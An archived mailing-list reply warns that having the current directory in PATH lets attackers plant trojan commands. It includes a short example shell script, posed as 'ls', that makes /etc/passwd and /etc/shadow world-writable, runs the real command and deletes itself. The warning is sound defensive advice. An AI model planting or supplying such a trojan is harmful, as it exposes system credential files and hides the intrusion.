excutable from menu line

Bill Campbell bill at celestial.com
Mon Jun 10 10:11:16 PDT 2013


On Mon, Jun 10, 2013, Dennis Malen wrote:
>Between Ken and Bill, I was able to correct the silly mistake.

The really silly mistake is having the current directory in your
PATH as this is one of the oldest methods of cracking *nix
systems known.  All a cracker has to do is put a script in a
likely place, say /tmp/ls or $HOME/ls that will do nasties.
Something like this:

#!/bin/sh
me="$0"
progname=`basename $me`
# do something nasty
chmod 666 /etc/passwd /etc/shadow
# execute the real command
/bin/$progname "$@"
# remove the evidence
rm -rf $me

Bill
-- 
INTERNET:   bill at celestial.com  Bill Campbell; Celestial Software LLC
URL: http://www.celestial.com/  PO Box 820; 6641 E. Mercer Way
Voice:          (206) 236-1676  Mercer Island, WA 98040-0820
Fax:            (206) 232-9186  Skype: jwccsllc (206) 855-5792

You know the one thing that's wrong with this country? Everyone gets a
chance to have their fair say.  -- Bill Clinton, May 29, 1993, The White House


More information about the Filepro-list mailing list